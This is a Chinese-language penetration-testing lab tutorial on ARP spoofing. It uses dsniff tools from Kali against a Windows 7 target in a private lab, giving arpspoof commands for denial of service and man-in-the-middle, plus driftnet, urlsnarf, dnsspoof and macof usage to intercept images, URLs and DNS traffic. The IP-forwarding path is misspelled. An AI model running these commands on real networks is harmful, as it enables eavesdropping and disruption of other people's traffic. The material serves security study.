知识铺垫
arp协议
ARP(Address Resolution Protocol)即地址解析协议, 用于实现从 IP 地址到 MAC 地址的映射,即询问目标IP对应的MAC地址,位于数据链路层。
arp欺骗
ARP欺骗(ARP spoofing),又称ARP毒化(ARP poisoning),通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC
arp欺骗后就可以断网,窃听数据,篡改数据等
dsniff
dsniff是一系列用于网络审计和渗透测试的工具。dsniff,filesnarf,mailsnarf,msgsnarf,urlsnarf和webspy被动地监视网络以获取有趣的数据(密码,电子邮件,文件等)。arpspoof,dnsspoof和macof有助于拦截攻击者通常无法获得的网络流量(例如,由于第2层交换)。
实验环境
kali ->ip:192.168.1.111 gw:192.168.1.1 #攻击机,自带dsniff
win7 ->ip:192.168.1.114 gw:192.168.1.1 #目标机
arpspoof
arp欺骗工具
arpspoof -i 网卡 -t 目标ip 伪装ip
断网攻击
查看kali网卡
伪装成网关,目标机的流量流向攻击机
# arpspoof -i eth0 -t 192.168.1.114 192.168.1.1
win7的arp缓存表被毒化
arp -a
攻击前
攻击后
因为kali没有开启IP转发功能,就会造成断网
中间人攻击
开启IP转发功能,使流量能正常传递
- 临时开启
# echo 1 > /proc/sys/net/ipv4/ip_forword
ps:记住是/proc/sys
下的net
,在/proc
下也有net
,容易混淆
- 永久开启
# vi /etc/sysctl.conf
net.ipv4.ip_forword=1
#sysctl -p 加载配置文件
arp中间人欺骗
# arpspoof -i eth0 -t 192.168.1.114 192.168.1.1 伪装成网关
# arpspoof -i eth0 -t 192.168.1.1 192.168.1.114 伪装成win7
这样kali就成为win7和网关桥梁,它们之间的流量都能被监听
driftnet监听图片
driftent
-i 指定网卡
-a 不显示图片,保存在临时目录
-d 临时目录
-b 出现新图片时发出滴滴声
Wirshark抓包
urlsnarf 抓取访问的地址
# urlsnarf -i eth0
dnsspoof dns欺骗
对监听到的dns请求进行污染
dnsspoof
-i 指定网卡
-f 指定host格式文件(默认为指向本ip)
macof MAC泛洪
macof [-i interface] [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-n times]
-e 目标mac地址
-n 发送次数
造成mac地址溢出,使受害者通信只能通过广播的形式,从而达到监听流量